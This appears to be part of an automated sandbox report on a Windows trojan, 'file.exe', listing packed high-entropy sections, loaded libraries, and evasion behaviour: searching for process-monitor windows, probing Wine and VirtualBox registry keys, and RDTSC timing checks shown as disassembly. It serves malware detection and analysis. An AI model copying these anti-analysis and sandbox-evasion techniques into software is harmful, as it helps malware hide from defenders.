      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101D3A90_2_0101D3A9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010593A80_2_010593A8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D33BB0_2_010D33BB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010073D00_2_010073D0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105B3D30_2_0105B3D3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010893D50_2_010893D5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010613D90_2_010613D9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010ED3E90_2_010ED3E9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010413E80_2_010413E8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011493EB0_2_011493EB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C93F30_2_010C93F3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100921E0_2_0100921E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103B2210_2_0103B221
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CF2320_2_010CF232
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E924F0_2_010E924F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB33A00_2_00FB33A0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CD2500_2_010CD250
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A52550_2_010A5255
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF53970_2_00FF5397
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103326E0_2_0103326E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108D2780_2_0108D278
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010ED2740_2_010ED274
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFB3750_2_00FFB375
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010032980_2_01003298
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F993600_2_00F99360
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E12AD0_2_010E12AD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9B3510_2_00F9B351
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B92A20_2_010B92A2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010912A20_2_010912A2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010572A90_2_010572A9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC533A0_2_00FC533A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108350C0_2_0108350C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A950D0_2_010A950D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108D5010_2_0108D501
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107D5110_2_0107D511
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B152B0_2_010B152B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101F5300_2_0101F530
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010855360_2_01085536
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010095420_2_01009542
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C35490_2_010C3549
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A35440_2_010A3544
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102D5550_2_0102D555
      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F98000 appears 55 times
      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FA4A30 appears 76 times
      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: file.exeStatic PE information: Section: ZLIB complexity 0.9976616565743944
      Source: file.exeStatic PE information: Section: rmyngibq ZLIB complexity 0.9944709241207951
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC0A6C CoCreateInstance,0_2_00FC0A6C
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: file.exeStatic file information: File size 1838080 > 1048576
      Source: file.exeStatic PE information: Raw size of rmyngibq is bigger than: 0x100000 < 0x198c00

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rmyngibq:EW;qytqqcga:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rmyngibq:EW;qytqqcga:EW;.taggant:EW;
      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
      Source: file.exeStatic PE information: real checksum: 0x1c43a8 should be: 0x1c94c4
      Source: file.exeStatic PE information: section name:
      Source: file.exeStatic PE information: section name: .idata
      Source: file.exeStatic PE information: section name:
      Source: file.exeStatic PE information: section name: rmyngibq
      Source: file.exeStatic PE information: section name: qytqqcga
      Source: file.exeStatic PE information: section name: .taggant
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120A167 push eax; mov dword ptr [esp], ecx0_2_0120ACD0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEE0AD push 7628542Ah; mov dword ptr [esp], esp0_2_00FF0196
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEA093 push 683962B8h; mov dword ptr [esp], eax0_2_00FEA0A6
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D819F push ecx; mov dword ptr [esp], edi0_2_011D81B3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEC047 push 771E6925h; mov dword ptr [esp], esp0_2_00FEFA02
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010621E7 push ebx; mov dword ptr [esp], esi0_2_010621F8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122E1C1 push 659C3487h; mov dword ptr [esp], ebx0_2_0122E1C9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115E1EF push esi; mov dword ptr [esp], ebx0_2_0115E217
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115E1EF push 2BEE993Eh; mov dword ptr [esp], ebp0_2_0115E239
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE81FC push edx; ret 0_2_00FE81FD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B800C push edi; mov dword ptr [esp], edx0_2_011B8022
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121E068 push ebx; mov dword ptr [esp], edx0_2_0121E0E0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D0098 push 31611189h; mov dword ptr [esp], edx0_2_011D00BB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BE08C push 1DB62156h; mov dword ptr [esp], eax0_2_011BE0F0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010380BE push eax; mov dword ptr [esp], edi0_2_0103871C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010380BE push edx; mov dword ptr [esp], 1F7F030Bh0_2_01038766
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010380BE push 5820EDD5h; mov dword ptr [esp], edi0_2_010387A3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012580E5 push edx; mov dword ptr [esp], ecx0_2_01258107
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012580E5 push 47ED5458h; mov dword ptr [esp], ecx0_2_01258211
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012580E5 push 362D58D5h; mov dword ptr [esp], edx0_2_01258253
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E80CE push eax; mov dword ptr [esp], 0E304F8Fh0_2_010E840C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E80CE push ebx; mov dword ptr [esp], edx0_2_010E842C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E80CE push ecx; mov dword ptr [esp], 6EEA8F79h0_2_010E8430
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E80CE push ebp; mov dword ptr [esp], 7FFF4A2Ah0_2_010E84F1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE82FA push edi; mov dword ptr [esp], ebp0_2_00FE8304
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106C310 push 53FE2631h; mov dword ptr [esp], edx0_2_0106C333
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106C310 push ebp; mov dword ptr [esp], edx0_2_0106C3BB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106C310 push esi; mov dword ptr [esp], edi0_2_0106C43F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106C310 push esi; mov dword ptr [esp], ebp0_2_0106C489
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106C310 push edx; mov dword ptr [esp], esp0_2_0106C4B9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106C310 push ebp; mov dword ptr [esp], ecx0_2_0106C4CB
      Source: file.exeStatic PE information: section name: entropy: 7.98596751431181
      Source: file.exeStatic PE information: section name: rmyngibq entropy: 7.954341436383283

      Boot Survival

      barindex
      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect sandboxes / dynamic malware analysis system (registry check)
      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8B68 second address: FE8B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8B71 second address: FE8B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FA1BCFB6B78h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156693 second address: 11566A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA1BD1DB196h 0x0000000c jo 00007FA1BD1DB17Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11566A9 second address: 11566B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11566B1 second address: 11566B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11566B5 second address: 11566B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E6EC second address: 115E6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11618A7 second address: 11618FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5EB0E91Ch 0x00000010 mov edi, dword ptr [ebp+122D2A30h] 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D3AA9h], esi 0x0000001e push 00000000h 0x00000020 push 00000003h 0x00000022 mov edi, dword ptr [ebp+122D2AC4h] 0x00000028 call 00007FA1BCFB6B79h 0x0000002d pushad 0x0000002e jnc 00007FA1BCFB6B78h 0x00000034 push esi 0x00000035 pop esi 0x00000036 push edi 0x00000037 jbe 00007FA1BCFB6B76h 0x0000003d pop edi 0x0000003e popad 0x0000003f push eax 0x00000040 jng 00007FA1BCFB6B7Eh 0x00000046 push ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11619D2 second address: 1161A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BD1DB17Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jno 00007FA1BD1DB178h 0x00000011 jmp 00007FA1BD1DB17Ah 0x00000016 popad 0x00000017 nop 0x00000018 or dword ptr [ebp+122D1A1Eh], ebx 0x0000001e push 00000000h 0x00000020 jc 00007FA1BD1DB17Ch 0x00000026 adc edx, 486CCC47h 0x0000002c call 00007FA1BD1DB179h 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161A18 second address: 1161A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161A1D second address: 1161A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161A22 second address: 1161A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d pop edi 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161A39 second address: 1161A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161B00 second address: 1161B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 084194A1h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FA1BCFB6B78h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3AA9h], eax 0x0000002e lea ebx, dword ptr [ebp+1244C6A9h] 0x00000034 mov ecx, dword ptr [ebp+122D2D88h] 0x0000003a call 00007FA1BCFB6B7Bh 0x0000003f stc 0x00000040 pop edi 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 jo 00007FA1BCFB6B78h 0x00000049 push edx 0x0000004a pop edx 0x0000004b pop eax 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FA1BCFB6B85h 0x00000055 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180430 second address: 1180436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180436 second address: 118043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118043A second address: 1180442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180442 second address: 1180447 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180447 second address: 1180450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180450 second address: 1180454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118125F second address: 1181272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA1BD1DB176h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FA1BD1DB176h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11752FF second address: 1175305 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175305 second address: 1175317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FA1BD1DB176h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175317 second address: 1175338 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1BCFB6B8Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175338 second address: 117534C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA1BD1DB176h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117534C second address: 117535A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181558 second address: 118155E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181ECE second address: 1181ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181ED4 second address: 1181EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181EDF second address: 1181EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181EE3 second address: 1181EED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1BD1DB176h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115828C second address: 115829F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DBC8 second address: 118DBE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1BD1DB184h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DD73 second address: 118DD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DD77 second address: 118DD87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FA1BD1DB176h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DD87 second address: 118DDD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B82h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FA1BCFB6B93h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA1BCFB6B80h 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DDD8 second address: 118DDF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BD1DB186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DF72 second address: 118DF82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B7Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E237 second address: 118E23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E23B second address: 118E23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E23F second address: 118E257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FA1BD1DB176h 0x00000011 jc 00007FA1BD1DB176h 0x00000017 popad 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E257 second address: 118E25C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E3ED second address: 118E401 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007FA1BD1DB176h 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E59E second address: 118E5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11924DB second address: 11924E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11924E1 second address: 11924E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11924E5 second address: 119255C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BD1DB186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 25F8E1DAh 0x00000012 jg 00007FA1BD1DB184h 0x00000018 call 00007FA1BD1DB179h 0x0000001d jmp 00007FA1BD1DB185h 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007FA1BD1DB17Ch 0x00000029 pushad 0x0000002a js 00007FA1BD1DB176h 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 popad 0x00000033 popad 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 push esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119255C second address: 1192560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
